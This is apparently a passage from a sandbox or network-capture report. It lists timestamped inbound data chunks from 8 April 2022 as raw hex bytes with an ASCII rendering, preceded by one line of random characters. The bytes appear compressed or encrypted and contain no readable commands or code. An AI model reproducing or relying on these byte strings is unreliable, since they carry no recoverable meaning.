OMw&%3kgbtZW3FiUbJS+*CRp\)464DxqQ5 oCwf6.,Is@:_Pd^ICAZ7u<C~ml4_/jE4B>W?X%jnZQIN@2@TL
2022-04-08 10:12:56 UTC	192	IN	Data Raw: e3 17 c4 04 34 4d 5c 1e 79 e0 a2 f3 45 1d 28 dc 20 50 42 a6 4c 62 52 d9 5c 4a 86 08 28 10 a1 a0 0d 20 cf 81 51 8a 4a 87 03 72 a3 26 8c 20 5e 2b 57 14 b5 63 7f 19 2e bc e8 15 76 c4 9d 8e 34 1c ee 46 93 88 f9 a2 76 d0 e2 1c 10 87 9f 5d 2d 00 98 0a 3c 86 71 19 00 63 67 40 a6 41 b2 cc 65 80 c3 b3 29 1a 7a 3b c8 29 fa 82 d2 14 a2 74 20 68 26 c0 2d c9 65 1e 8f 02 1c ff bb aa 01 f9 36 00 9e 34 36 8d 79 00 0b fe 7a 2e 60 07 50 81 0b 8f 8b bc 1a 12 b9 16 99 7e 09 8d f4 2e 30 4a 47 ce 64 35 d8 f9 40 b5 8c 0f 69 5d a0 8d 7f d0 e9 7c 80 13 f8 44 12 07 c7 b2 fe 27 67 32 34 06 d1 85 b3 80 bb 1f 70 ed 11 f8 22 df 86 bb cc 66 5e 06 fc 85 e3 63 7e 20 50 4c 14 c8 2a 94 87 4b c4 53 45 c5 69 e6 6a b2 98 2f 47 2f 4e 5d d2 8b 04 e4 94 95 b8 fe fe 15 66 f6 11 4e 12 98 95 3d 43 Data Ascii: 4M\yE( PBLbR\J( QJr& ^+Wc.v4Fv]-<qcg@Ae)z;)t h&-e646yz.`P~.0JGd5@i]\|D'g24p"f^c~ PL*KSEij/G/N]fN=C
2022-04-08 10:12:56 UTC	208	IN	Data Raw: b7 9a 70 d0 a6 1c 12 20 e4 58 93 20 92 c6 fd cb 46 91 38 8e 68 c1 73 82 58 33 03 f9 70 39 3d 52 4c 22 23 a3 39 8d 10 95 11 54 24 a0 23 c0 bc 6d 7c e3 71 b4 30 a0 e3 21 e0 e6 c0 e7 7a 03 29 22 15 1e 8f 9b b1 81 1f ce fe ab 52 0c fb 69 c8 e4 61 1b f9 d5 f0 5e 4e 6a 70 28 c8 98 d0 4a 12 fe ab 0a a4 32 77 61 b2 32 85 04 56 fd 0c 0e 22 9b 6a 46 02 42 0c db 01 04 21 e2 92 3f 6c a4 f3 cb aa a2 ee 44 7e 6d 51 ad 1e 01 cd 7f 0a 04 e2 2a b4 79 08 c7 84 2c ac 40 72 9a 02 c0 42 e5 91 b0 98 6d a8 a2 30 b1 6c 0a 2a 76 79 16 85 88 c1 3b c2 c5 03 67 62 78 36 fc 38 90 0f 57 8c b3 ac f3 e2 a8 86 10 55 08 d6 09 c2 5d da 10 3b 21 28 e3 56 80 d8 a8 2b b2 ca b7 b2 7a 13 cc 24 c0 04 19 3b 56 cd 24 b0 11 e4 9a 40 2e a0 bf e2 38 c2 32 45 c7 32 5a 19 7c 64 1c 44 03 79 ec 34 66 86 Data Ascii: p X F8hsX3p9=RL"#9T$#m\|q0!z)"Ria^Njp(J2wa2V"jFB!?lD~mQy,@rBm0lvy;gbx68WU];!(V+z$;V$@.82E2Z\|dDy4f
2022-04-08 10:12:56 UTC	224	IN	Data Raw: 18 68 12 04 6b 26 34 b1 31 e2 c2 2b 02 1e 3f 81 d7 9a db 72 3c 01 0e 19 2b db 5c 48 39 24 6c c6 65 0e 0b d9 59 69 66 2e de 32 74 d3 a9 64 56 86 10 9a ea c1 ff 30 ca 18 09 01 bd ee af 6a 17 2a c4 36 41 b5 17 eb 3c f0 3a ab 38 54 12 60 b8 f1 1c 05 6c 2e 87 d7 35 03 2f 94 01 23 88 65 77 fb 60 55 61 e8 5c c0 16 94 75 61 48 b7 81 61 23 03 24 0a e8 4f f2 dd d9 66 b6 f1 e6 38 20 44 14 4b 6d 1e ce 20 c5 00 08 ac 14 71 b2 06 3c 07 87 00 8d cc 73 d8 7f 69 a2 f6 bd c8 d3 17 f9 7f 6d 79 e8 7d 26 f2 dd 10 04 8a 9a 60 20 41 74 0a 02 5c b4 21 f9 8c 49 60 6c c0 e2 43 10 2c d4 e6 f1 51 28 5e 79 86 a3 31 d0 4c 02 a2 06 1f 38 d0 56 90 54 72 00 99 20 8c 88 fa 83 22 e4 db c5 40 0f fa 60 c8 c8 ed 80 b2 e6 f2 59 88 35 e7 e1 da c5 fc 56 00 ec 3f 00 2c b3 f5 68 00 5b 83 58 f3 4c Data Ascii: hk&41+?r<+\H9$leYif.2tdV0j*6A<:8T`l.5/#ew`Ua\uaHa#$Of8 DKm q<simy}&` At\!I`lC,Q(^y1L8VTr "@`Y5V?,h[XL
2022-04-08 10:12:56 UTC	240	IN	Data Raw: 92 52 31 b9 fc ee ce b5 fb 3b 56 1b df 6e 5e 1b f6 ac 77 61 df 9e b1 be fc f2 0d 25 62 a9 bf 36 5e 2f 08 36 14 39 cf 60 2c 7a fe f2 47 a3 8d e9 93 37 c1 fc 35 e4 a2 bd cd 33 eb 65 30 b4 0b 46 20 d9 55 7f 34 af 21 0c 4e b2 5d a4 4c e6 0f d9 03 f3 4b e6 ae d4 10 a0 8e 40 f9 1f ad 06 05 38 fb f9 98 1e db 0b e8 d9 15 fc d5 c0 45 e0 4b e1 83 d5 00 e4 63 73 87 fc 48 37 37 36 20 24 7c 10 d0 c4 4c 32 5f 08 88 f0 a6 28 ec 17 e0 9e 18 86 bf 13 47 f1 13 a5 e2 02 4c 0e 9d 43 85 dc 15 1a da d8 32 ca 20 88 62 0d 02 b0 49 0b 63 d1 c0 46 0a 9f bb 1f 3e b8 97 4d 03 02 2d 00 36 43 32 48 43 15 1c a0 f9 4c 0c 41 b0 9e 64 d0 00 40 7b de 6b 52 40 1d c5 1c 5c 9d 14 98 00 ac 5c 56 55 15 6e eb 87 01 97 4f c0 8c 00 62 28 b7 0d b8 dc 05 eb 59 1c fe 5c 4f 8a 08 76 a6 46 c2 2f 5f c0 Data Ascii: R1;Vn^wa%b6^/69`,zG753e0F U4!N]LK@8EKcsH776 $\|L2_(GLC2 bIcF>M-6C2HCLAd@{kR@\\VUnOb(Y\OvF/_
2022-04-08 10:12:56 UTC	256	IN	Data Raw: f7 92 79 e4 8f b5 9d 83 ac a4 0e 4b b5 63 b8 1e ed da 79 bd 05 49 e3 f3 1e 4b bd 7a 1c dd d4 c1 cb b8 6a 79 43 e9 fd f2 86 ec 59 b7 c5 cf 04 fd 7c eb 78 f2 1a c7 ec ca 10 f5 e4 e7 aa 75 5a 05 5f 0c db 5e 96 0f 9e e7 58 49 d5 80 6d db 47 ee ac d5 54 18 ae 63 4e 51 bc 2c 39 63 c6 80 a9 c4 57 4f cf 3b 6f 72 f6 3c f9 f4 d1 ba 5b cc 25 b5 ed ea e7 3f da 2d 67 7f a7 76 4e 68 ef bf b2 ba 29 7b 9b ed cb 8a fe 14 9e 07 8f 87 11 ca 70 22 05 4e b2 5a f8 b3 0a 7e fe 1b cf 8b 27 af fb fc fa 9f f6 5f c6 4b ec 99 8c 15 65 e1 47 ff 8a e0 4c 6a ce 02 cf fe 02 9f 28 02 23 74 f8 80 f0 a3 41 60 e2 78 06 84 34 92 cb 7c 44 1c 26 87 40 71 bb 00 e8 d2 80 06 0e e8 5c 01 0b 31 d6 3a 6b 01 9c 93 01 7c ef f1 ed 18 38 8c 00 6b 2b 60 0d be 5b 06 e9 30 a7 ef 12 f2 c3 62 d3 20 fc 23 97 Data Ascii: yKcyIKzjyCY\|xuZ_^XImGTcNQ,9cWO;or<[%?-gvNh){p"NZ~'_KeGLj(#tA`x4\|D&@q\1:k\|8k+`[0b #
2022-04-08 10:12:56 UTC	272	IN	Data Raw: aa 76 e2 a1 77 d5 d5 fe cf d2 96 d1 2f 2c ab 38 73 3d 6b 9d cd fc 9e 73 02 ce 32 39 1c cf ba c3 ac 51 ab 3e d2 59 d6 87 d3 b9 af df 6d bb e1 7d 91 32 8f 3d c6 29 df 79 eb 50 8d e8 91 69 9f 63 70 dc d0 ad c6 e1 01 d2 89 3f 0b 55 5e ff ce de d4 98 cf f6 90 6d 5f 53 be a3 f7 b1 0f 5d 49 d0 2b 1d 55 9d 73 b8 48 fd 60 e9 b2 8d 03 b7 94 87 36 9c 9f 1d 66 ac b9 ec 12 5b 93 15 77 98 ff 67 6f 41 f1 95 81 a5 b7 95 1a 34 ee 66 a9 2b bf 08 5f 7a 6c d1 c6 6e ed 47 53 2e aa ff 58 4b be be e6 53 e1 1d b5 c3 7b 70 41 e8 c9 97 57 9d 0a 5f 7f 7a 7c 70 b3 f4 9e 5f 64 fb fd e7 6e 67 8c 0f fc 4c 19 75 d2 b8 f2 fb 7d 9b 8a f3 89 75 c5 c5 b7 2f 3c bf a2 bc 52 a1 d6 3b 7b 7a fe 6b cc 2d 20 13 3b e0 f3 b1 53 26 76 dc ce f4 72 08 3e da bf ee b2 39 eb 94 2e fd d1 7a 5f 37 ca 69 52 Data Ascii: vw/,8s=ks29Q>Ym}2=)yPicp?U^m_S]I+UsH`6f[wgoA4f+_zlnGS.XKS{pAW_z\|p_dngLu}u/<R;{zk- ;S&vr>9.z_7iR
2022-04-08 10:12:56 UTC	288	IN	Data Raw: 41 72 d2 b7 0b ab 43 5d a3 ef f5 7c 2d 1c 57 8a 38 3b ba 40 a1 e7 d0 ce dd 8a f2 0b a7 a5 d5 7b 44 07 e5 6e d9 e9 57 bf 64 41 e3 8b b8 f1 05 2b 5e 1a cf dc 78 90 a7 75 ed 0e ee a0 a6 69 58 f7 6e 6d ef 0c 17 eb b4 ad 51 db 3e 87 a8 be db 0a 08 46 f5 8a a7 2f f3 17 a7 df 48 54 fe fa 4b 62 73 56 e7 b3 c7 f1 1c a7 dc c6 42 eb b5 d9 cd 4f 1e d9 2b cb fc e9 25 ef 1e 98 dd b1 eb cc 81 f9 75 b9 3d 52 a4 85 91 0f cf ee b3 3f 69 3a 26 f1 bd 3b 96 d2 7c e2 d3 b9 83 fd e9 53 07 7c d3 c6 3e 3f bc 78 2c 25 ce 63 ad de d9 c3 4b 9d c2 b4 05 82 b7 85 11 eb 6f ae fc d0 b8 7a 2f fd c0 82 4b a4 c8 38 5c c6 d2 b9 f7 7a eb 06 b9 10 15 e7 d6 a5 d5 95 a6 1b a3 54 b6 cf b2 35 70 4f 31 a8 25 d9 e7 45 ef 6e 7d ff 22 fa 58 59 f4 54 ad 4d fd c5 15 05 67 c6 f7 0d 3e de 58 76 e7 e3 ae Data Ascii: ArC]\|-W8;@{DnWdA+^xuiXnmQ>F/HTKbsVBO+%u=R?i:&;\|S\|>?x,%cKoz/K8\zT5pO1%En}"XYTMg>Xv
2022-04-08 10:12:56 UTC	304	IN	Data Raw: 24 95 ef cc 92 eb 39 b5 3b df 9a f7 df 92 d1 3e 3d a3 67 34 7e da 52 d9 89 b1 bd 01 ab d9 cf 37 e9 45 0e a6 74 c4 ed 98 25 69 fe ab fa f4 d6 fd 07 de fc da ed 98 be a0 d9 47 7b e4 4a b9 da e6 5e e5 7d 75 3a dd e9 5b 9b 97 3e 70 e9 b2 b4 1e 8f 7e 73 ad b6 f0 26 2d e1 43 c4 6f a7 f5 87 5f 4e bb ef 34 ff 87 f7 0a d9 ec bc f4 df 0a b7 18 07 fd 4a 2f 1d 6f a2 8f 6f 8c 52 52 4c 80 e3 ef 1a ff 4b ac e1 fa 45 66 8c 60 ad 65 77 df 6e 9a 37 9a 2b 5f 65 d2 9e 77 76 6c fa d7 66 89 fd 6f e6 54 8f ab df a6 fa 19 ff 7a 42 a1 79 2d 4c f5 e6 6b 0c d4 af b3 d4 53 09 eb bd b7 52 cf e6 9b 63 47 eb d3 fb 5b 57 4d ff 95 d1 60 e0 ac 51 d5 f4 7e da 37 a6 a7 0d 61 f9 8c 8e ed 14 e5 d9 be 12 b1 c9 dd de a7 86 cb 9b 0f 0c 3c a9 f8 b1 52 6d a9 93 c4 97 f0 2d f9 8a 3b 32 37 9d f4 1d Data Ascii: $9;>=g4~R7Et%iG{J^}u:[>p~s&-Co_N4J/ooRRLKEf`ewn7+_ewvlfoTzBy-LkSRcG[WM`Q~7a<Rm-;27
2022-04-08 10:12:56 UTC	320	IN	Data Raw: e6 fb f2 6d 2d 4a 0a 17 e4 3f 13 6c fa f6 c0 ae 56 6e b7 f6 15 fc e9 85 32 a9 77 63 cf 8f 15 d7 6d 24 2e 1d 98 57 49 9d ff c1 2b 74 84 34 c3 5b c1 a4 9c 0b 1a 02 7f c4 f0 5d 36 5e cf 78 35 e9 bb dd 49 d7 41 a5 fa d4 16 a6 f1 4f 8d f9 b3 aa 95 4c cf b6 4f 33 2a 3e 99 19 e0 99 4e 3f c5 6c bc ef f6 d6 f9 77 e3 52 45 2d 72 cc 6a 15 3d 97 15 77 b7 17 ad b5 a4 cd 5f f6 53 fe ae cf d9 a6 fe de fc 3d 71 8e 47 0e 66 44 31 db 57 b9 fc b8 65 f7 2a 6b eb f2 c1 d2 a7 67 b3 ed 6d 53 5e f8 4d 7b c7 2f 4a ac 59 9b b1 41 7f 6f 97 ca fb 95 99 77 ce dc 32 5b c9 4e b6 ac dd 5f bc fb a4 0e f1 97 1c 2f cb d1 e4 c8 95 c7 8d a5 a7 58 43 e4 bb bf 19 09 b5 3f 7f de cd da fe 98 29 b7 4b 54 19 f6 73 69 df ac 82 78 e9 59 aa ca b2 87 da 68 9e 37 22 ef 29 bf 5e 13 23 1f 60 1e e3 7f af Data Ascii: m-J?lVn2wcm$.WI+t4[]6^x5IAOLO3>N?lwRE-rj=w_S=qGfD1WekgmS^M{/JYAow2[N_/XC?)KTsixYh7")^#`
2022-04-08 10:12:56 UTC	336	IN	Data Raw: fc eb e3 a5 7c ff 36 ed 49 85 86 0f 51 dd aa 3f 64 76 ec 18 5b b8 bc fc ba cd bc 53 ad 7b 6a c6 e6 e8 1c be bd 80 34 58 34 3d 7d 57 84 b8 76 5e 51 a2 ea e5 c3 c0 31 25 f5 99 69 e2 d9 cb 5c 4f ef 9a 0b 3e fd 9b d5 18 c6 d6 92 14 bb f7 79 67 a2 db 83 0c 33 3d 9f 5f 38 fa ad a0 74 b9 da b4 76 33 e7 27 aa 9c f5 b5 5b 7d df 9d 98 78 63 79 ca 69 e1 92 e8 8e 43 ca b6 8f bd 4f 2f 4b 51 57 be b5 71 7f d8 22 43 dd 3d 69 3d 2a fe 2f 43 36 0e 2f af 97 dc 0b d6 36 9b 04 3b 7e f7 6e fb 55 e9 f5 f0 b1 77 a3 2f e6 35 71 ef da f5 1f f2 1b a6 91 b6 1c 28 ab 3e ce b9 e0 61 78 24 06 4f 55 72 cd 33 dc 3a eb f8 a9 d6 f5 92 2d a5 33 2b 62 bf 31 9e 6a ff 0c aa a0 57 e6 75 1a ad d1 de 7c 5a 1d 60 81 a2 23 9b 64 6d dd ac 2f 46 d3 6a 96 ee 1e 7e d9 52 77 a7 ed 5a 49 d1 17 df fa da Data Ascii: \|6IQ?dv[S{j4X4=}Wv^Q1%i\O>yg3=_8tv3'[}xcyiCO/KQWq"C=i=*/C6/6;~nUw/5q(>ax$OUr3:-3+b1jWu\|Z`#dm/Fj~RwZI
2022-04-08 10:12:56 UTC	352	IN	Data Raw: 35 35 c7 96 95 57 56 c4 2d 0a 73 18 f5 28 2b 9f 79 7a 0e f9 31 08 cb 92 7a d3 3f 3f 66 cf 17 ee a1 9d cb 26 6e 94 1e 7e be f2 d2 d3 1d e6 66 3d dc 9c a5 3e d3 17 cc 7c 2d 17 71 be 75 c3 2f 60 ec 97 ff 6d eb 47 31 4d d1 d1 8b 77 8c 0d 02 e4 6e 1f 9f 90 29 bb 7c a3 e7 f0 f4 ee 17 71 22 cb 39 9f 3c 87 bd ee 31 f6 1c b8 e3 3d 66 5e 4d 7b 61 73 ff 74 bf 78 a3 f9 d9 46 bb 67 bd 54 9d f7 da bb c6 c2 7c 34 8a 14 47 64 17 67 fb 75 c5 73 b4 6b a2 57 c9 bb e6 16 a9 d9 c4 58 b2 6b 8c bf 8b 8b 3d bf bd 34 b8 4b d6 a1 67 b9 57 ea 9c 2f d3 35 f7 28 5e ae 67 db cb 28 5f 5e 6c a8 b6 fa c7 cd c3 b3 ef 85 35 d5 0e df 76 57 bc 37 ef d5 ee e4 d8 9e e3 46 6f 4d 12 f3 52 ff 94 16 1c 8f fe f2 7c e3 64 21 2f 88 b3 80 f7 c0 78 23 ff d6 e6 39 7e 27 0d 2e 0e 8d 7d 1b 96 56 28 c5 9d Data Ascii: 55WV-s(+yz1z??f&n~f=>\|-qu/`mG1Mwn)\|q"9<1=f^M{astxFgT\|4GdguskWXk=4KgW/5(^g(_^l5vW7FoMR\|d!/x#9~'.}V(
2022-04-08 10:12:56 UTC	368	IN	Data Raw: 48 70 74 4c a2 46 b8 2a 7b 87 f3 03 b9 ca 96 15 8e ca 16 9a 74 8d d9 ea fe ee 90 c0 aa b9 33 ec 22 54 29 f1 9e 76 5c 6d 7d 60 a1 4e 48 09 95 27 87 44 9b aa cb 58 db 32 cb 4c c2 e4 f5 f3 54 08 8a ba d6 b3 0b c2 e3 42 41 92 86 b6 2a 08 c5 e4 3e 75 17 17 93 8a ca c7 45 22 4f 1a 9f 92 58 4c 05 d5 82 62 3e a5 ab d8 63 02 e2 2f f7 a7 95 95 2a 8b d5 e5 14 f6 20 ee 94 eb 89 b4 39 6e 65 d3 1f cd 1d 77 8e f2 ae fa 59 dd b3 46 4f 4e e4 af 64 fd b6 b9 5a 98 34 f5 d4 b6 a6 e6 a5 99 7d 35 47 e2 fd d6 3f e6 4d 2d 1a 6d 9a 7e 25 4e 7a dd 9a a7 53 13 37 ef 5a f6 be d4 50 dd 2b 49 de 2f e8 c4 c3 9b fe c7 92 79 ad 57 a9 e1 1b ad da be 2b b6 cc bd 7b fa 07 27 e0 de 0b fe f3 f1 77 4e 76 ba e1 2f 6d db 3c 6f 78 c9 53 74 22 95 6d c7 15 4b d6 69 46 9d 0c d4 b9 13 8a ef 92 c4 fe Data Ascii: HptLF{t3"T)v\m}`NH'DX2LTBA>uE"OXLb>c/* 9newYFONdZ4}5G?M-m~%NzS7ZP+I/yW+{'wNv/m<oxSt"mKiF
2022-04-08 10:12:56 UTC	384	IN	Data Raw: eb 44 59 15 3b 44 ad 85 26 b4 59 d6 e7 84 f9 b9 6f 84 d3 32 f6 51 d5 cc ee 0a 67 31 77 0b 07 53 1d a9 d9 86 7d 3c 66 2c f3 bf 9c c9 90 d4 30 f7 df 59 0d f7 04 a7 62 7a e9 b7 05 5c 64 3d aa 9a 1a 21 8b e9 7b 14 39 f9 e9 d8 19 2b 70 34 54 6c c2 fd 49 40 d5 cd 3d 21 5c 15 93 51 28 0a b5 f3 f0 70 e4 04 1b 17 ab 69 17 02 c3 c0 70 a0 aa 08 92 34 54 e3 28 40 43 db 78 76 14 e0 c8 2a 45 79 eb 53 e8 36 65 e1 20 49 dd 0d 5e 8e 0c b3 82 46 cb a2 55 24 a2 66 97 bf 8b b1 c2 74 ef 22 2e 2d 43 50 cc e1 78 bb b1 1c b7 8d 27 69 cd 94 f7 5b b1 27 78 bd f0 48 d0 95 a3 e6 8f 96 15 0f 76 ad 7a 7c 62 ce 89 6f 87 55 4a a6 eb 0d dc aa 25 50 97 17 ac 38 2c 52 eb 18 fd bd e6 45 d8 45 19 41 f4 c2 cc 37 96 df 34 b6 64 44 58 69 6a 6e 3c aa 9a f7 2c b4 ba fb bd 62 50 c5 41 9f 83 e9 99 Data Ascii: DY;D&Yo2Qg1wS}<f,0Ybz\d=!{9+p4TlI@=!\Q(pip4T(@Cxv*EyS6e I^FU$ft".-CPx'i['xHvz\|boUJ%P8,REEA74dDXijn<,bPA
2022-04-08 10:12:56 UTC	400	IN	Data Raw: 9f 2c c4 80 e0 4b db 1a 8b d2 d7 c8 b8 24 0d 47 6c 57 54 ae e2 2c fe 97 27 af 5a 78 0d f6 9b 7e 4d 80 09 9f 08 00 57 99 de ad 1d ca f5 2e 5f 01 e4 01 31 e3 51 fc 9a a4 cd a2 53 59 3f c1 49 8d 6b 9e bf c2 bf 81 0f fe d7 2b 7e aa 4e c7 86 9d 13 b2 7f 81 ff 9d 33 19 1a ff b7 d4 60 05 38 f1 ff 96 1a e2 8a 45 46 3c 1e c5 0e 5e 66 19 c9 c4 c6 52 31 8c 27 0f 48 80 e0 47 02 c1 8e 02 cc a6 40 c1 34 cf 95 ac 0a ac a3 c2 c9 4a 8a fa 15 4a aa b2 6e a4 24 39 7b e0 10 aa 46 09 09 57 d0 aa 54 70 8f 05 da 49 26 6a 8e 2a 8e a5 49 96 11 80 9c 6a a7 a8 0a 34 52 23 41 0a d0 77 2e ad e6 8c 17 93 77 16 93 79 e3 0e 7c de 6f 2e d7 1c cb 70 4e 4f 77 b7 65 81 62 8e 67 27 bc 70 b0 ce 99 d2 d0 a5 ea 71 d9 7a c7 47 dc 7e f7 b4 e9 7b 99 ae f5 37 40 cd f6 65 86 83 a9 e9 de e4 93 57 bb Data Ascii: ,K$GlWT,'Zx~MW._1QSY?Ik+~N3`8EF<^fR1'HG@4JJn$9{FWTpI&j*Ij4R#Aw.wy\|o.pNOwebg'pqzG~{7@eW
2022-04-08 10:12:56 UTC	416	IN	Data Raw: 74 61 66 41 3a 53 58 e3 80 0c dd d7 47 31 40 0d 5c fb 63 12 74 b0 12 19 e8 d0 d5 90 94 0a 67 61 fc 50 6e 5e 25 39 9b 9f c6 80 c0 cd 22 00 3f 22 26 e8 ce 65 63 7c 1b 2e da 78 14 3e 10 97 9a af 62 26 41 02 7c 18 4e 12 44 1e a1 82 01 19 e5 7f 36 21 f1 61 a2 08 78 e6 22 16 ac 02 00 3c 86 e6 86 f0 31 0e 00 57 48 81 d9 fa f6 e9 a3 46 38 3e 88 4a f8 30 e1 f1 4c 3f 1e a6 80 8b 5a 6a 90 aa 01 b0 1c 89 80 9e 0c 08 7e 5c 50 56 83 e4 74 c1 c3 74 76 3e 13 5f 36 28 62 8a 70 7b 78 a2 0a 32 cd 29 ed b6 60 d0 ab 98 80 39 8f 54 db d9 c8 c0 ad 2b 2a ca 2d 8a c8 24 c4 76 a9 a5 58 29 a8 34 40 b6 90 a5 6a 80 37 cb 0c e4 d1 dd 31 73 e1 0d 60 2e 7c 83 42 0d 12 f5 e2 50 83 03 20 c5 a2 0e a3 3e c3 9f 68 15 02 db ff 48 ca e0 a4 05 5b ff 97 a4 ec df 80 fb b7 2d 4c d3 e3 cf c4 c2 a2 Data Ascii: tafA:SXG1@\ctgaPn^%9"?"&ec\|.x>b&A\|ND6!ax"<1WHF8>J0L?Zj~\PVttv>_6(bp{x2)`9T+*-$vX)4@j71s`.\|BP >hH[-L
2022-04-08 10:12:56 UTC	432	IN	Data Raw: 42 30 3d 4f 00 7d 12 9e 58 81 71 fe 1c d1 ea 52 9c c5 25 c3 07 3b 08 c8 9c 52 61 89 1f e5 a2 04 06 78 70 92 f8 d2 2a 41 c5 1a 0e fb e1 97 2f 31 f0 6d 12 d9 18 78 20 01 e8 71 4a 10 72 5b 31 d6 be fc 72 0a e0 fb e2 0c ac 9b 07 27 03 2c 0e 07 2c 5c e4 cc 7f ce 40 ca 01 6b c8 5e 49 b8 a8 86 95 99 69 09 19 28 e6 05 27 00 c9 60 1e 04 35 2e 76 05 9f cf c0 2b 24 93 90 f1 39 d7 d9 57 08 31 c8 81 15 93 4f bb 06 e8 33 c4 2c 5e 10 42 c2 d4 7d b2 f9 34 38 69 79 a7 9b 51 80 66 31 bc 79 65 2f 08 9b 40 4b fe 91 38 06 58 8d af bd 2a 02 74 39 c4 7c bf e7 a1 50 0c 44 64 0a 10 b2 f9 56 46 98 41 50 05 f8 1b 6a 30 6c 04 b3 99 c8 2e 63 12 a9 20 f0 7b a7 e0 3b 81 b7 e5 39 1b 01 62 f1 08 b6 9d 09 f8 5a 68 c3 0d cf 25 9b 17 17 fd 03 b8 68 93 4d 50 2a ed c8 33 4a 06 73 ab de 0b 41 Data Ascii: B0=O}XqR%;RaxpA/1mx qJr[1r',,\@k^Ii('`5.v+$9W1O3,^B}48iyQf1ye/@K8Xt9\|PDdVFAPj0l.c {;9bZh%hMP*3JsA
2022-04-08 10:12:56 UTC	448	IN	Data Raw: 3b aa 7e f1 de ff 7c dd 1d e5 31 35 ac fb 6c 9a 60 51 55 73 56 56 c4 15 23 e9 d4 7d 7b 9a c2 4e dd 6b b9 3f b1 6f ce 52 75 1b fb 85 08 07 00 ae 02 f1 6a 72 2b 05 42 cd 24 f8 da c3 b1 10 06 ff 37 a5 d7 1b 17 84 fe 77 07 8a 31 c9 22 c1 3b 80 79 23 17 ae b3 3e a8 22 e2 33 66 8b de 29 c4 25 73 39 74 12 27 2f a7 52 4c 2c 00 c8 04 07 92 68 7c 13 0b 94 22 a7 2e 49 4f 90 88 3d 44 e0 85 2a a6 40 11 0c b7 47 90 9b 17 fc 30 dc 8b cd 93 60 02 f2 33 1c 4b 80 20 c5 02 38 17 47 79 e1 ca 5d c8 34 e7 2d 0c f3 61 38 0f af 8c f3 6c 52 2f 0c 2f 11 02 d9 34 c8 94 09 b1 26 81 1a 9a 03 e4 c3 bb 44 02 c8 e0 ec 7a 89 22 da 57 54 34 a1 03 43 75 8e 85 fb a4 4b 19 99 0f 6a 8a 8a 6c 7d 38 69 26 42 0a c4 f6 bb 00 73 e4 f5 00 4e 81 84 85 00 9e 8d 02 3c fc e1 39 9b 78 90 71 3f 83 c7 cb Data Ascii: ;~\|15l`QUsVV#}{Nk?oRujr+B$7w1";y#>"3f)%s9t'/RL,h\|".IO=D*@G0`3K 8Gy]4-a8lR//4&Dz"WT4CuKjl}8i&BsN<9xq?
2022-04-08 10:12:56 UTC	464	IN	Data Raw: ff 76 86 31 85 d8 29 55 a5 92 d9 16 d4 7d dd 92 59 69 ef 2e d0 4b 78 22 dc 65 28 b1 f9 f6 89 9a 9f e7 9e e0 f7 ef 4f 7b 0b 7a a5 ad fd f9 9b db 32 0e f4 fa ee 8b 98 77 fa fe 45 1b 8b d8 62 ae 8b 42 ea 55 49 4d cf c0 77 82 d9 f6 71 ab ae 8a 8c d8 d6 fa bf b5 d7 1e 38 fb 23 4d a3 7c 9d 7a dd 9e cc ad fd 43 7b 68 e3 77 15 5a ae 7c bc b9 2b 67 59 97 d6 8e 4a a9 58 db e3 f8 15 4a ca 8a 69 ba b3 66 28 dd 3c 6d 62 86 bd 0b eb b5 71 90 8c 91 51 7e 7e fb a1 c6 fe c9 94 9d f0 18 9c 49 ff a6 f2 c0 21 f8 fb 2f f3 ad 14 50 6a 7f 3b 4e be fe 0f ec 4a 48 64 7a 82 ea db 92 7c 01 da f1 47 5a 54 ba 88 09 36 4a 7a d3 05 9f 24 81 35 9b 40 86 dc 3a 39 de 6c 75 38 b7 03 50 51 83 50 14 87 d2 11 87 d1 f1 16 d6 89 c5 e4 1a c0 13 92 5c 4d 89 3a c4 fe a2 08 7c 26 04 1a 2d 50 84 da Data Ascii: v1)U}Yi.Kx"e(O{z2wEbBUIMwq8#M\|zC{hwZ\|+gYJXJif(<mbqQ~~I!/Pj;NJHdz\|GZT6Jz$5@:9lu8PQP\M:\|&-P
2022-04-08 10:12:56 UTC	480	IN	Data Raw: c7 65 93 bb 5e 38 0e 29 cd 3d 3a b9 e5 ee 81 00 a0 25 df e0 bb e8 4e 98 d6 e1 42 9f 05 4a d2 ed 1c cb 15 b7 be 1d 7c ac 73 a9 f0 d4 d3 97 98 cf e7 8a d5 04 b9 2f bc 9b d9 4f 8d e4 66 2e fb b3 f8 18 51 70 5b 5e 6e 7b 7e 40 50 a8 a9 52 db 56 65 c3 0f 26 3f f3 af ae 33 ee f6 9d d2 b2 7f e1 74 87 37 ec 5c fd 35 d3 6f 77 c5 99 3a c8 07 9f 7c b5 9d 3a 78 f8 c3 5b f6 8d fa e7 0b ba 14 2c c9 57 2a 1c bf f3 6a 2d 2e cf 2e bd 9b b8 f5 e6 cd 73 2b 7f 2e 5a cb 16 9f 59 d4 d8 c7 4c 70 3a 0e 12 a8 81 d5 9c 75 97 ae b6 ee d3 8f 7c 31 c3 38 72 df 8e 1e 4a 4d d1 59 cd 19 a6 6f b3 9d 77 66 66 b6 b4 74 ec 61 47 ff b1 51 b1 77 f5 be 5a 1e 6c 40 3b c8 22 8e ac 9c b1 d0 46 c9 fe 91 ca 86 e7 ac 05 1f 62 63 3e 3c ed dd 5c 6d 7f a2 73 5b d5 d5 79 1d ee a3 23 cf bf ce ac 30 f9 a8 Data Ascii: e^8)=:%NBJ\|s/Of.Qp[^n{~@PRVe&?3t7\5ow:\|:x[,W*j-..s+.ZYLp:u\|18rJMYowfftaGQwZl@;"Fbc><\ms[y#0
2022-04-08 10:12:56 UTC	496	IN	Data Raw: 6a f7 e3 bc 96 17 95 81 9f fb 89 5f c5 f6 da 60 16 4f 41 eb c2 dd cb 1d f4 96 aa 55 26 1b 8f 0b 03 15 13 cf 9e fc fd e5 ec e0 1e cd 14 db b5 9f e4 76 9f fa 31 ed 6d 24 a9 60 f1 d6 fe c1 82 e5 7b fb 09 0d 66 01 5f 8b a3 8f 53 fb 86 e8 2b 9e b1 66 8e 27 86 73 7d b7 af 9f d1 bb 3b 25 66 ee 74 91 c6 2e fa e5 bb ee 41 d9 85 57 d4 36 cb 58 4e 3d b3 33 a9 a2 89 f7 b6 e7 a6 f3 74 5f c1 01 bf 88 bd 73 ce cc c3 bd dd 46 8b 40 94 a1 d9 96 b4 8c 2b 8b 9f 66 61 43 66 27 97 7c cd 7d a5 a4 e1 fa 7b db c3 95 b9 2b 2c 35 1e 7d af d1 9b 99 96 b0 b9 26 c8 65 69 20 88 59 f9 23 d1 2b ec 94 c9 a0 fd a9 5a 4c 47 26 a9 ef 53 e8 67 5e c4 ca 55 bf 95 6a ee 7d 59 21 38 7a 71 47 c1 f4 d5 0d 